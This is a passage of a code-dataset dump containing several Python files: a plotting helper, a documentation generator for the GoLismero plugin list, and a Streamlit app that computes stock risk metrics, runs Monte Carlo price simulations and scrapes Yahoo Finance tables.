{1}s\".format(toc_r - tic_r, toc_p - tic_p))\n","repo_name":"weidler/enhanced-wordnet","sub_path":"src/glosses/GlossTransformation.py","file_name":"GlossTransformation.py","file_ext":"py","file_size_in_byte":15351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"45521529713","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib.ticker as ticker\nfrom dataclasses import dataclass, field\nfrom typing import Optional\nfrom openpyxl.utils import column_index_from_string\nfrom multiprocessing import Process\nimport scienceplots\nimport japanize_matplotlib\n\n\n@dataclass\nclass Lim:\n min: float\n max: float\n\n def copy_with(self, min: Optional[float] = None, max: Optional[float] = None):\n return Lim(\n min=min if min is not None else self.min,\n max=max if max is not None else self.max,\n )\n\n\n@dataclass\nclass Axis:\n major: Optional[list[float]] = None\n minor: Optional[float] = None\n lim: Optional[Lim] = None\n\n def copy_with(\n self,\n major: Optional[list[float]] = None,\n minor: Optional[float] = None,\n lim: Optional[Lim] = None,\n ):\n return Axis(\n major=major if major is not None else self.major,\n minor=minor if minor is not None else self.minor,\n lim=lim if lim is not None else self.lim,\n )\n\n\n@dataclass\nclass LogAxis:\n major: Optional[list[float]] = None\n minor: Optional[bool] = None\n lim: Optional[Lim] = None\n\n def copy_with(\n self,\n major: Optional[list[float]] = None,\n minor: Optional[bool] = None,\n lim: Optional[Lim] = None,\n ):\n return LogAxis(\n major=major if major is not None else self.major,\n minor=minor if minor is not None else self.minor,\n lim=lim if lim is not None else self.lim,\n )\n\n\n@dataclass\nclass Label:\n xlabel: list[str] = field(default_factory=list)\n y1label: list[str] = field(default_factory=list)\n y2label: list[str] = field(default_factory=list)\n\n def copy_with(\n self,\n xlabel: Optional[list[str]] = None,\n y1label: Optional[list[str]] = None,\n y2label: Optional[list[str]] = None,\n ):\n return Label(\n xlabel=xlabel if xlabel is not None else self.xlabel,\n y1label=y1label if y1label is not None else self.y1label,\n y2label=y2label if y2label is not None else self.y2label,\n )\n\n\n@dataclass\nclass Sheet:\n excel_file: str\n sheet_name: str\n skiprows: Optional[int] = None\n\n def __post_init__(self):\n self.df_excel = pd.read_excel(\n self.excel_file,\n sheet_name=self.sheet_name,\n skiprows=self.skiprows,\n )\n\n\n@dataclass\nclass Marker:\n marker: Optional[str] = None\n markersize: Optional[float] = None\n ls: Optional[str] = None\n color: Optional[str] = None\n\n def copy_with(\n self,\n marker: Optional[str] = None,\n markersize: Optional[float] = None,\n ls: Optional[str] = None,\n color: Optional[str] = None,\n ):\n return Marker(\n marker=marker if marker is not None else self.marker,\n markersize=markersize if markersize is not None else self.markersize,\n ls=ls if ls is not None else self.ls,\n color=color if color is not None else self.color,\n )\n\n\n@dataclass\nclass Data:\n x_col: str\n y_col: str\n legend: bool = True\n marker: Optional[Marker] = None\n label: Optional[str] = None\n sheet: Optional[Sheet] = None\n\n def __post_init__(self):\n self.x = column_index_from_string(self.x_col) - 1\n self.y = column_index_from_string(self.y_col) - 1\n\n def copy_with(\n self,\n x_col: Optional[str] = None,\n y_col: Optional[str] = None,\n legend: Optional[bool] = None,\n marker: Optional[Marker] = None,\n label: Optional[str] = None,\n sheet: Optional[Sheet] = None,\n ):\n return Data(\n x_col=x_col if x_col is not None else self.x_col,\n y_col=y_col if y_col is not None else self.y_col,\n legend=legend if legend is not None else self.legend,\n marker=marker if marker is not None else self.marker,\n label=label if label is not None else self.label,\n sheet=sheet if sheet is not None else self.sheet,\n )\n\n def set_sheet(self, sheet: Optional[Sheet] = None):\n self.sheet = self.sheet or sheet\n\n def set_data(self):\n if self.sheet is not None:\n self.x_data = self.sheet.df_excel[self.sheet.df_excel.columns[self.x]]\n self.y_data = self.sheet.df_excel[self.sheet.df_excel.columns[self.y]]\n self.label = r\"{0}\".format(self.label)\n self.x_label = r\"{0}\".format(self.sheet.df_excel.columns[self.x])\n self.y_label = r\"{0}\".format(self.sheet.df_excel.columns[self.y])\n\n\n@dataclass\nclass BaseLine:\n value: float\n legend: bool = True\n label: Optional[str] = None\n linestyle: Optional[str] = None\n color: Optional[str] = None\n lim: Optional[Lim] = None\n\n def copy_with(\n self,\n value: Optional[float] = None,\n legend: Optional[bool] = None,\n label: Optional[str] = None,\n linestyle: Optional[str] = None,\n color: Optional[str] = None,\n lim: Optional[Lim] = None,\n ):\n return BaseLine(\n value=value if value is not None else self.value,\n legend=legend if legend is not None else self.legend,\n label=label if label is not None else self.label,\n linestyle=linestyle if linestyle is not None else self.linestyle,\n color=color if color is not None else self.color,\n lim=lim if lim is not None else self.lim,\n )\n\n\n@dataclass\nclass Graph:\n out_file: str\n data: list[Data]\n data2: Optional[list[Data]] = None\n vertical_base_line: Optional[list[BaseLine]] = None\n horizontal_base_line: Optional[list[BaseLine]] = None\n sheet: Optional[Sheet] = None\n marker: Optional[list[Marker]] = None\n x_axis: Optional[Axis | LogAxis] = None\n y1_axis: Optional[Axis | LogAxis] = None\n y2_axis: Optional[Axis | LogAxis] = None\n x_label: list[str] = field(default_factory=list)\n y1_label: list[str] = field(default_factory=list)\n y2_label: list[str] = field(default_factory=list)\n\n def __post_init__(self):\n self.figure = plt.figure()\n for data in self.data:\n data.set_sheet(self.sheet)\n data.set_data()\n self.ax = self.figure.add_subplot(1, 1, 1)\n self.ax.set_box_aspect(1)\n if self.data2 is not None:\n for data2 in self.data2:\n data2.set_sheet(self.sheet)\n data2.set_data()\n self.ax2 = self.ax.twinx()\n self.ax2.set_box_aspect(1)\n else:\n self.ax2 = None\n\n def copy_with(\n self,\n out_file: Optional[str] = None,\n data: Optional[list[Data]] = None,\n data2: Optional[list[Data]] = None,\n vertical_base_line: Optional[list[BaseLine]] = None,\n horizontal_base_line: Optional[list[BaseLine]] = None,\n sheet: Optional[Sheet] = None,\n marker: Optional[list[Marker]] = None,\n x_axis: Optional[Axis | LogAxis] = None,\n y1_axis: Optional[Axis | LogAxis] = None,\n y2_axis: Optional[Axis | LogAxis] = None,\n x_label: Optional[list[str]] = None,\n y1_label: Optional[list[str]] = None,\n y2_label: Optional[list[str]] = None,\n ):\n return Graph(\n out_file=out_file if out_file is not None else self.out_file,\n data=data if data is not None else self.data,\n data2=data2 if data2 is not None else self.data2,\n vertical_base_line=vertical_base_line\n if vertical_base_line is not None\n else self.vertical_base_line,\n horizontal_base_line=horizontal_base_line\n if horizontal_base_line is not None\n else self.horizontal_base_line,\n sheet=sheet if sheet is not None else self.sheet,\n marker=marker if marker is not None else self.marker,\n x_axis=x_axis if x_axis is not None else self.x_axis,\n y1_axis=y1_axis if y1_axis is not None else self.y1_axis,\n y2_axis=y2_axis if y2_axis is not None else self.y2_axis,\n x_label=x_label if x_label is not None else self.x_label,\n y1_label=y1_label if y1_label is not None else self.y1_label,\n y2_label=y2_label if y2_label is not None else self.y2_label,\n )\n\n def plot(self):\n for i, d in enumerate(self.data):\n self.ax.plot(\n d.x_data,\n d.y_data,\n label=d.label,\n markersize=d.marker.markersize\n if d.marker is not None\n else self.marker[i % len(self.marker)].markersize\n if self.marker is not None\n else None,\n marker=d.marker.marker\n if d.marker is not None\n else self.marker[i % len(self.marker)].marker\n if self.marker is not None\n else None,\n ls=d.marker.ls\n if d.marker is not None\n else self.marker[i % len(self.marker)].ls\n if self.marker is not None\n else None,\n color=d.marker.color\n if d.marker is not None\n else self.marker[i % len(self.marker)].color\n if self.marker is not None\n else None,\n )\n if self.data2 is not None and self.ax2 is not None:\n for i, d in enumerate(self.data2):\n self.ax2.plot(\n d.x_data,\n d.y_data,\n label=d.label,\n markersize=d.marker.markersize\n if d.marker is not None\n else self.marker[(i + len(self.data)) % len(self.marker)].markersize\n if self.marker is not None\n else None,\n marker=d.marker.marker\n if d.marker is not None\n else self.marker[(i + len(self.data)) % len(self.marker)].marker\n if self.marker is not None\n else None,\n ls=d.marker.ls\n if d.marker is not None\n else self.marker[(i + len(self.data)) % len(self.marker)].ls\n if self.marker is not None\n else None,\n color=d.marker.color\n if d.marker is not None\n else self.marker[(i + len(self.data)) % len(self.marker)].color\n if self.marker is not None\n else None,\n )\n if self.vertical_base_line is not None:\n for line in self.vertical_base_line:\n if self.ax2 is None:\n self.ax.axvline(\n x=line.value,\n label=line.label,\n ls=line.linestyle,\n color=line.color,\n ymax=line.lim.max if line.lim is not None else 1,\n ymin=line.lim.min if line.lim is not None else 0,\n )\n else:\n self.ax2.axvline(\n x=line.value,\n label=line.label,\n ls=line.linestyle,\n color=line.color,\n ymax=line.lim.max if line.lim is not None else 1,\n ymin=line.lim.min if line.lim is not None else 0,\n )\n if self.horizontal_base_line is not None:\n for line in self.horizontal_base_line:\n if self.ax2 is None:\n self.ax.axhline(\n y=line.value,\n label=line.label,\n ls=line.linestyle,\n color=line.color,\n xmax=line.lim.max if line.lim is not None else 1,\n xmin=line.lim.min if line.lim is not None else 0,\n )\n else:\n self.ax2.axhline(\n y=line.value,\n label=line.label,\n ls=line.linestyle,\n color=line.color,\n xmax=line.lim.max if line.lim is not None else 1,\n xmin=line.lim.min if line.lim is not None else 0,\n )\n\n def set_label(self):\n if self.x_label == []:\n self.ax.set_xlabel(self.data[0].x_label)\n else:\n self.ax.set_xlabel(\"\\n\".join(self.x_label))\n if self.y1_label == []:\n self.ax.set_ylabel(self.data[0].y_label)\n else:\n self.ax.set_ylabel(\"\\n\".join(self.y1_label))\n if self.ax2 is not None and self.data2 is not None:\n if self.y2_label == []:\n self.ax2.set_ylabel(self.data2[0].y_label)\n else:\n self.ax2.set_ylabel(\"\\n\".join(self.y2_label))\n\n def set_axis(self):\n if isinstance(self.x_axis, Axis):\n if self.x_axis.lim is not None:\n self.ax.set_xlim(self.x_axis.lim.min, self.x_axis.lim.max)\n if self.x_axis.major is not None:\n self.ax.set_xticks(self.x_axis.major)\n if self.x_axis.minor is not None:\n self.ax.xaxis.set_minor_locator(\n ticker.MultipleLocator(self.x_axis.minor),\n )\n else:\n self.ax.xaxis.set_minor_locator(\n ticker.NullLocator(),\n )\n elif isinstance(self.x_axis, LogAxis):\n self.ax.set_xscale(\"log\")\n if self.x_axis.lim is not None:\n self.ax.set_xlim(self.x_axis.lim.min, self.x_axis.lim.max)\n if self.x_axis.major is not None:\n self.ax.set_xticks(self.x_axis.major)\n if self.x_axis.minor is not None:\n self.ax.xaxis.set_minor_locator(\n ticker.LogLocator(\n numticks=14,\n subs=(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9),\n )\n )\n else:\n self.ax.xaxis.set_minor_locator(\n ticker.NullLocator(),\n )\n if isinstance(self.y1_axis, Axis):\n if self.y1_axis.lim is not None:\n self.ax.set_ylim(self.y1_axis.lim.min, self.y1_axis.lim.max)\n if self.y1_axis.major is not None:\n self.ax.set_yticks(self.y1_axis.major)\n if self.y1_axis.minor is not None:\n self.ax.yaxis.set_minor_locator(\n ticker.MultipleLocator(self.y1_axis.minor),\n )\n else:\n self.ax.yaxis.set_minor_locator(\n ticker.NullLocator(),\n )\n elif isinstance(self.y1_axis, LogAxis):\n self.ax.set_yscale(\"log\")\n if self.y1_axis.lim is not None:\n self.ax.set_ylim(self.y1_axis.lim.min, self.y1_axis.lim.max)\n if self.y1_axis.major is not None:\n self.ax.set_yticks(self.y1_axis.major)\n if self.y1_axis.minor is not None:\n self.ax.yaxis.set_minor_locator(\n ticker.LogLocator(\n numticks=14,\n subs=(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9),\n )\n )\n else:\n self.ax.yaxis.set_minor_locator(\n ticker.NullLocator(),\n )\n if self.ax2 is not None and isinstance(self.y2_axis, Axis):\n if self.y2_axis.lim is not None:\n self.ax2.set_ylim(self.y2_axis.lim.min, self.y2_axis.lim.max)\n if self.y2_axis.major is not None:\n self.ax2.set_yticks(self.y2_axis.major)\n if self.y2_axis.minor is not None:\n self.ax2.yaxis.set_minor_locator(\n ticker.MultipleLocator(self.y2_axis.minor),\n )\n else:\n self.ax2.yaxis.set_minor_locator(\n ticker.NullLocator(),\n )\n elif self.ax2 is not None and isinstance(self.y2_axis, LogAxis):\n self.ax2.set_yscale(\"log\")\n if self.y2_axis.lim is not None:\n self.ax2.set_ylim(self.y2_axis.lim.min, self.y2_axis.lim.max)\n if self.y2_axis.major is not None:\n self.ax2.set_yticks(self.y2_axis.major)\n if self.y2_axis.minor is not None:\n self.ax2.yaxis.set_minor_locator(\n ticker.LogLocator(\n numticks=14,\n subs=(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9),\n )\n )\n else:\n self.ax2.yaxis.set_minor_locator(\n ticker.NullLocator(),\n )\n\n def set_legend(self):\n h, l = self.ax.get_legend_handles_labels()\n h2, l2 = (\n self.ax2.get_legend_handles_labels() if self.ax2 is not None else ([], [])\n )\n legend = (\n [d.legend for d in self.data]\n + [d.legend for d in self.data2 or []]\n + [line.legend for line in self.vertical_base_line or []]\n + [line.legend for line in self.horizontal_base_line or []]\n )\n empty_l = [(l + l2)[i] for i, le in enumerate(legend) if le]\n empty_h = [(h + h2)[i] for i, le in enumerate(legend) if le]\n self.ax.legend(\n empty_h,\n empty_l,\n loc=\"best\",\n frameon=False,\n fancybox=False,\n framealpha=1,\n )\n\n def save(self):\n self.ax.tick_params(axis=\"both\", direction=\"in\", which=\"both\")\n # self.ax2.tick_params(axis=\"both\", direction=\"in\", which=\"both\")\n # self.ax.tick_params(\n # labelbottom=False, labelleft=False, labelright=False, labeltop=False\n # )\n # self.ax.tick_params(bottom=False, left=False, right=False, top=False)\n # self.ax.axis(\"off\")\n self.figure.savefig(self.out_file)\n\n def execute(self):\n self.plot()\n print(f\"plot {self.out_file}\")\n self.set_label()\n print(f\"set label {self.out_file}\")\n self.set_axis()\n print(f\"set axis {self.out_file}\")\n self.set_legend()\n print(f\"set legend {self.out_file}\")\n self.save()\n print(f\"save {self.out_file}\")\n\n\ndef make_graph(\n graphs: list[Graph],\n multiprocessing: bool = True,\n):\n plt.style.use([\"science\", \"ieee\"])\n if multiprocessing:\n threads: list[Process] = []\n for graph in graphs:\n t = Process(target=graph.execute)\n t.start()\n threads.append(t)\n for thread in threads:\n thread.join()\n else:\n for graph in graphs:\n graph.execute()\n","repo_name":"m20079/AM-radio","sub_path":"python/make_graph.py","file_name":"make_graph.py","file_ext":"py","file_size_in_byte":18969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39281533872","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__license__ = \"\"\"\nGoLismero 2.0 - The web knife - Copyright (C) 2011-2014\n\nGolismero project site: https://github.com/golismero\nGolismero project mail: contact@golismero-project.com\n\nThis program is free software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License\nas published by the Free Software Foundation; either version 2\nof the License, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\"\"\"\n\n# Fix the module path.\nimport sys\nimport os\nfrom os import path\nhere = path.split(path.abspath(__file__))[0]\nif not here: # if it fails use cwd instead\n here = path.abspath(os.getcwd())\ngolismero = path.join(here, \"..\", \"..\")\nthirdparty_libs = path.join(golismero, \"thirdparty_libs\")\nif path.exists(thirdparty_libs):\n sys.path.insert(0, thirdparty_libs)\n sys.path.insert(0, golismero)\n\nfrom golismero.api.plugin import get_plugin_type_display_name, get_plugin_type_description\nfrom golismero.managers.pluginmanager import PluginManager\nfrom golismero.common import OrchestratorConfig\n\ncategories = (\"import\", \"recon\", \"scan\", \"attack\", \"intrude\", \"cleanup\", \"report\", \"ui\")\n\nindex = \"\"\"List of plugins\n===============\n\nThese are the plugins shipped by default with GoLismero:\n\n.. toctree::\n :maxdepth: 2\n\n\"\"\".replace(\"\\r\\n\", \"\\n\")\n\ndef gen():\n pluginManager = PluginManager()\n pluginManager.find_plugins( OrchestratorConfig() )\n for plugin_type in categories:\n with open(path.join(here, plugin_type + \".rst\"), \"w\") as f:\n name = get_plugin_type_display_name(plugin_type)\n print >>f, name\n print >>f, \"*\" * len(name)\n print >>f, \"\"\n print >>f, get_plugin_type_description(plugin_type)\n print >>f, \"\"\n plugins = pluginManager.get_plugins(plugin_type)\n if plugins:\n for plugin_id in sorted(plugins.keys()):\n plugin_info = plugins[plugin_id]\n display_name = \"%s (*%s*)\" % (plugin_info.display_name, plugin_id[plugin_id.rfind(\"/\")+1:])\n description = plugin_info.description\n description = description.replace(\"\\r\\n\", \"\\n\")\n description = description.replace(\"\\n\", \"\\n\\n\")\n print >>f, display_name\n print >>f, \"=\" * len(display_name)\n print >>f, \"\"\n print >>f, description\n print >>f, \"\"\n if plugin_info.plugin_args:\n width_key = 17\n width_value = 17\n for key, value in plugin_info.plugin_args.iteritems():\n if key in plugin_info.plugin_passwd_args:\n value = \"\\\\*\" * 16\n width_key = max(width_key, len(key))\n width_value = max(width_value, len(value))\n print >>f, \"%s %s\" % ((\"=\" * width_key), (\"=\" * width_value))\n print >>f, (\"**Argument name**%s **Default value**%s\" % ((\" \" * (width_key - 17)), (\" \" * (width_value - 17)))).rstrip()\n print >>f, \"%s %s\" % ((\"-\" * width_key), (\"-\" * width_value))\n for key, value in plugin_info.plugin_args.iteritems():\n value = value.replace(\"\\r\\n\", \"\\n\")\n value = value.replace(\"\\n\", \" \")\n if key in plugin_info.plugin_passwd_args:\n value = \"\\\\*\" * 16\n pad_key = (\" \" * (width_key - len(key)))\n pad_value = (\" \" * (width_value - len(value)))\n print >>f, (\"%s%s %s%s\" % (key, pad_key, value, pad_value)).rstrip()\n print >>f, (\"%s %s\" % ((\"=\" * width_key), (\"=\" * width_value))).rstrip()\n print >>f, \"\"\n else:\n print >>f, \"There are currently no plugins in this category.\"\n print >>f, \"\"\n with open(path.join(here, plugin_type + \".rst\"), \"rU\") as f:\n data = f.read()\n with open(path.join(here, plugin_type + \".rst\"), \"wb\") as f:\n f.write(data)\n with open(\"index.rst\", \"wb\") as f:\n f.write(index)\n for plugin_type in categories:\n f.write(\" %s\\n\" % plugin_type)\n\nif __name__ == '__main__':\n gen()\n","repo_name":"golismero/golismero","sub_path":"doc/plugins/source/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":838,"dataset":"github-code","pt":"75"} +{"seq_id":"24008319118","text":"# import packages\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nfrom copy import copy\nfrom scipy import stats\nimport plotly.express as px\nimport plotly.figure_factory as ff\nimport plotly.graph_objects as go\nimport datetime\nimport pandas as pd\nimport yfinance as yf\nimport plotly.graph_objects as go\nimport streamlit as st\nimport datetime\nimport pandas as pd\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nfrom copy import copy\nfrom scipy import stats\nimport plotly.express as px\nimport plotly.figure_factory as ff\nimport plotly.graph_objects as go\nimport yfinance as yf\nimport plotly.graph_objects as go\nimport streamlit as st\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport datetime\nfrom scipy.stats import norm\nimport requests\nfrom bs4 import BeautifulSoup\nimport cufflinks as cf\n\ncf.go_offline()\nfrom lxml import html\nimport requests\nimport numpy as np\nimport pandas as pd\nimport os\n#import talib\nimport datetime\nimport pandas as pd\nimport yfinance as yf\n\nfrom arch import arch_model\n#from arch.__future__ import reindexing\nimport math\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nimport numpy as np\nfrom io import StringIO\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport pandas_datareader\nimport datetime\nimport pandas_datareader.data as web\nfrom scipy.stats import norm\n\n\n\n\nst.title(\"Welcome To Stock Ticker Analyzer\")\n\n\n\n\nclass ValueAtRiskMonteCarlo:\n\n def __init__(self, S, mu, sigma, c, n, iterations):\n self.S = S\n self.mu = mu\n self.sigma = sigma\n self.c = c\n self.n = n\n self.iterations = iterations\n\n def simulation(self):\n stock_data = np.zeros([self.iterations, 1])\n rand = np.random.normal(0, 1, [1, self.iterations])\n\n # equation for the S(t) stock price\n stock_price = self.S * np.exp(self.n * (self.mu - 0.5 * self.sigma ** 2) + self.sigma * np.sqrt(self.n) * rand)\n # we have to sort the stock prices to determine the percentile\n stock_price = np.sort(stock_price)\n\n # it depends on the confidence level: 95% -> 5 and 99% -> 1\n percentile = np.percentile(stock_price, (1 - self.c) * 100)\n\n return self.S - percentile\n\n\n\nticker = st.text_input('Enter Ticker EX:\"HCLTECH.NS\"',value=\"AARTIIND.NS\")\nbse = '^BSESN'\ntickers = [ticker,bse]\n\ndef cal_data(tickers):\n data = pd.DataFrame()\n for t in tickers:\n t = t.upper()\n data[t] = yf.download(t, period='4y')['Adj Close']\n sec_returns = np.log(data / data.shift(1))\n cov = sec_returns.cov() * 250\n cov_with_market = cov.iloc[0, 1]\n market_var = sec_returns[bse].var() * 250\n MSFT_beta = cov_with_market / market_var\n st.write(\"Beta is : {}\".format(MSFT_beta))\n returns = np.log(data / data.shift(1))\n\n vols = returns.std() * 250 ** 0.5 * 100\n st.write(\"Volatility is : {}\".format(vols))\n annual_returns = returns.mean() * 250 * 100\n st.write(\"Return is : {}\".format(annual_returns))\n sharpe_ratio = annual_returns[ticker] / vols[ticker]\n st.write(\"Shape Ratio : {}\".format(sharpe_ratio))\n CV = (vols / annual_returns) * 100\n st.write(\"CV : {}\".format(CV))\n\n\n\ndef CAGR(DF):\n \"function to calculate the Cumulative Annual Growth Rate of a trading strategy\"\n df = DF.copy()\n df[\"daily_ret\"] = DF[\"Adj Close\"].pct_change()\n df[\"cum_return\"] = (1 + df[\"daily_ret\"]).cumprod()\n n = len(df) / 252\n CAGR = (df[\"cum_return\"][-1]) ** (1 / n) - 1\n return CAGR\n\n\ndef volatility(DF):\n \"function to calculate annualized volatility of a trading strategy\"\n df = DF.copy()\n df[\"daily_ret\"] = DF[\"Adj Close\"].pct_change()\n vol = df[\"daily_ret\"].std() * np.sqrt(252)\n return vol\n\n\ndef sharpe(DF, rf):\n \"function to calculate sharpe ratio ; rf is the risk free rate\"\n df = DF.copy()\n sr = (CAGR(df) - rf) / volatility(df)\n return sr\n\n\ndef sortino(DF, rf):\n \"function to calculate sortino ratio ; rf is the risk free rate\"\n df = DF.copy()\n df[\"daily_ret\"] = DF[\"Adj Close\"].pct_change()\n neg_vol = df[df[\"daily_ret\"] < 0][\"daily_ret\"].std() * np.sqrt(252)\n sr = (CAGR(df) - rf) / neg_vol\n return sr\n\n\ndef max_dd(DF):\n \"function to calculate max drawdown\"\n df = DF.copy()\n df[\"daily_ret\"] = DF[\"Adj Close\"].pct_change()\n df[\"cum_return\"] = (1 + df[\"daily_ret\"]).cumprod()\n df[\"cum_roll_max\"] = df[\"cum_return\"].cummax()\n df[\"drawdown\"] = df[\"cum_roll_max\"] - df[\"cum_return\"]\n df[\"drawdown_pct\"] = df[\"drawdown\"] / df[\"cum_roll_max\"]\n max_dd = df[\"drawdown_pct\"].max()\n return max_dd\n\n\ndef calmar(DF):\n \"function to calculate calmar ratio\"\n df = DF.copy()\n clmr = CAGR(df) / max_dd(df)\n return clmr\n\ndef signals(dfnew):\n dfnew['50DMA'] = dfnew['Close'].rolling(window=50).mean()\n dfnew['200DMA'] = dfnew['Close'].rolling(window=200).mean()\n dfnew['crit1'] = dfnew['Close'] >= dfnew['200DMA']\n dfnew['cr12'] = (dfnew['50DMA'] >= dfnew['200DMA']) | dfnew['crit1'] == True\n st.dataframe(dfnew.tail(100),800,800)\n\n\ndf = pd.DataFrame()\ndf = yf.download(ticker, period='2y')\n\n\n\ncal_data(tickers)\n\ncg = CAGR(df)\nvola = volatility(df)\nshar = sharpe(df,0.06)\nsor = sortino(df,0.06)\nmd = max_dd(df)\ncalm = calmar(df)\n\nst.write(\"\\n The Compunded Annual Groth of the stock is {}%\".format(cg*100))\nst.write(\"\\n The Volatility of the stock is {}%\".format(vola*100))\nst.write(\"\\n The Sharp Ratio is: {}\".format(shar))\nst.write(\"\\n The Sortino Ratio is: {}\".format(sor))\nst.write(\"\\n The MAX Draw Down it shows loss for the investment {}%\".format(md*100))\nst.write(\"\\n The Calamr Ratio is(It shows the Risk Adjusted Return) : {}\".format(calm))\n\nst.header(\"Trading Signals\")\nsignals(df)\ndef monte_carlo(ticker):\n data = pd.DataFrame()\n data[ticker] = yf.download(ticker, period='2y')['Adj Close']\n log_returns = np.log(1 + data.pct_change())\n u = log_returns.mean()\n var = log_returns.var()\n drift = u - (0.5 * var)\n stdev = log_returns.std()\n\n\n\n t_intervals = 250\n iterations = 1000\n\n daily_returns = np.exp(drift.values + stdev.values * norm.ppf(np.random.rand(t_intervals, iterations)))\n S0 = data.iloc[-1]\n price_list = np.zeros_like(daily_returns)\n price_list[0] = S0\n for t in range(1, t_intervals):\n price_list[t] = price_list[t - 1] * daily_returns[t]\n st.header(\"MONTE CARLO SIMULATION:\")\n st.line_chart(price_list)\n st.header(\"The MAXIMUM PRICE OBTAINED FROM MONTE CARLO SIMULATION IS:\")\n a = price_list.max()\n a\n st.header(\"The MINIMUM PRICE OBTAINED FROM MONTE CARLO SIMULATION IS:\")\n\n b = price_list.min()\n b\n st.header(\"The MEAN PRICE OBTAINED FROM MONTE CARLO SIMULATION IS:\")\n c = price_list.mean()\n c\n st.write(\"Expected price: \", np.mean(price_list))\n st.write(\"Quantile (5%): \", np.percentile(price_list, 5))\n st.write(\"Quantile (95%): \", np.percentile(price_list, 95))\n\n plt.axvline(np.percentile(price_list,5), color='r', linestyle='dashed', linewidth=2)\n plt.axvline(np.percentile(price_list,95), color='r', linestyle='dashed', linewidth=2)\n fig, ax = plt.subplots()\n ax.hist(price_list,bins=100)\n st.pyplot(fig)\n\n\n\n\n\n\nmonte_carlo(ticker)\n\ndef balance_sheet(ticker):\n from datetime import datetime\n import lxml\n from lxml import html\n import requests\n import numpy as np\n import pandas as pd\n\n symbol = ticker\n\n url = 'https://finance.yahoo.com/quote/' + symbol + '/balance-sheet?p=' + symbol\n\n # Set up the request headers that we're going to use, to simulate\n # a request by the Chrome browser. Simulating a request from a browser\n # is generally good practice when building a scraper\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'close',\n 'DNT': '1', # Do Not Track Request Header\n 'Pragma': 'no-cache',\n 'Referrer': 'https://google.com',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36'\n }\n\n # Fetch the page that we're going to parse, using the request headers\n # defined above\n page = requests.get(url, headers=headers)\n\n # Parse the page with LXML, so that we can start doing some XPATH queries\n # to extract the data that we want\n tree = html.fromstring(page.content)\n\n # Smoke test that we fetched the page by fetching and displaying the H1 element\n tree.xpath(\"//h1/text()\")\n\n table_rows = tree.xpath(\"//div[contains(@class, 'D(tbr)')]\")\n\n # Ensure that some table rows are found; if none are found, then it's possible\n # that Yahoo Finance has changed their page layout, or have detected\n # that you're scraping the page.\n assert len(table_rows) > 0\n\n parsed_rows = []\n\n for table_row in table_rows:\n parsed_row = []\n el = table_row.xpath(\"./div\")\n\n none_count = 0\n\n for rs in el:\n try:\n (text,) = rs.xpath('.//span/text()[1]')\n parsed_row.append(text)\n except ValueError:\n parsed_row.append(np.NaN)\n none_count += 1\n\n if (none_count < 4):\n parsed_rows.append(parsed_row)\n\n df = pd.DataFrame(parsed_rows)\n st.dataframe(df,800,800)\n\ndef financials(ticker):\n from datetime import datetime\n import lxml\n from lxml import html\n import requests\n import numpy as np\n import pandas as pd\n\n symbol = ticker\n\n url = 'https://finance.yahoo.com/quote/' + symbol + '/financials?p=' + symbol\n\n # Set up the request headers that we're going to use, to simulate\n # a request by the Chrome browser. Simulating a request from a browser\n # is generally good practice when building a scraper\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'close',\n 'DNT': '1', # Do Not Track Request Header\n 'Pragma': 'no-cache',\n 'Referrer': 'https://google.com',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36'\n }\n\n # Fetch the page that we're going to parse, using the request headers\n # defined above\n page = requests.get(url, headers=headers)\n\n # Parse the page with LXML, so that we can start doing some XPATH queries\n # to extract the data that we want\n tree = html.fromstring(page.content)\n\n # Smoke test that we fetched the page by fetching and displaying the H1 element\n tree.xpath(\"//h1/text()\")\n\n table_rows = tree.xpath(\"//div[contains(@class, 'D(tbr)')]\")\n\n # Ensure that some table rows are found; if none are found, then it's possible\n # that Yahoo Finance has changed their page layout, or have detected\n # that you're scraping the page.\n assert len(table_rows) > 0\n\n parsed_rows = []\n\n for table_row in table_rows:\n parsed_row = []\n el = table_row.xpath(\"./div\")\n\n none_count = 0\n\n for rs in el:\n try:\n (text,) = rs.xpath('.//span/text()[1]')\n parsed_row.append(text)\n except ValueError:\n parsed_row.append(np.NaN)\n none_count += 1\n\n if (none_count < 4):\n 